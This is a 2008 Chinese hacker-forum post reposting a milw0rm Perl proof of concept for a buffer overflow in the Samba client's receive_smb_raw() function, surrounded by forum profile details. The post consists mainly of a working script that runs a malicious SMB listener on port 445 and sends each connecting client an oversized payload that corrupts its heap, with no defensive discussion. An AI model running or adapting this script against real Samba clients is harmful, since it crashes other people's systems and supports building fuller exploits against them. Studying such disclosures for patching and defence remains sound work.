[黑客新闻] Samba (client) receive_smb_raw() Buffer Overflow Vulnerability PoC

敗類

吥噈媞魭嘛

版主-地方父母官

Rank: 7 Rank: 7 Rank: 7

①苆隨緣

帖子: 549
威望: 0 点
T币: 99 个
警告: 0 次
活力: 1063 点
性别: 男
来自: 無烬潶黯
在线时间: 121 小时
注册时间: 2008-4-16
最后登录: 2008-12-5

315支持者勋章论坛版主勋章

发短消息
加为好友
当前在线

1^# 大中小发表于 2008-6-2 09:47 只看该作者

Samba (client) receive_smb_raw() Buffer Overflow Vulnerability PoC

#!/usr/bin/perl
# 06/01/2008 - k`sOSe
#
# ~ # smbclient //localhost/w00t
# *** glibc detected *** smbclient: free(): invalid next size (fast): 0x0823c2d8 ***
#

use warnings;
use strict;
use IO::Socket;

my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '445', Listen => 1, Reuse => 1) || die($!);

while(my $csock = $sock->accept())
{
      print $csock       "\x00" .
                     "\x01\xff\xff" .
                     "\x41" x 131071;

}

# milw0rm.com [2008-06-01]

拿什麼證明莪啲洊茬

TOP

‹‹ 上一主题 | 下一主题 ››